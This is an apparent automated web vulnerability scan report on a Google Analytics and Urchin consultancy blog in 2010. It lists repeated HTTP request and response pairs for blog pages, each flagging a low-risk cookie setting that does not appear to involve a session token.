GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:41:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:41:40 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:41:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:18:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:19:00 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:19:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:17:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:17:19 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:17:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/99-unique-keywords-by-month.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:15:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:15:24 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:15:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/56-seo/59-search-ranking-position-with-ga.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:03:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:04:00 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:04:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:11:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:11:36 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:11:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:15:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:15:17 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:15:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28100
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:07:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:07:10 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:07:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27984
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:38 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:33:20 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:33:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:59:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:59:08 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:59:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/87-visitor-scoring-with-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:00:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:00:42 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:00:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:59:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:59:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:59:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/62-urchin/94-exclude-bots-in-urchin.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:58:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:58:00 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:58:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22373
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:16:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:16:04 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:16:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
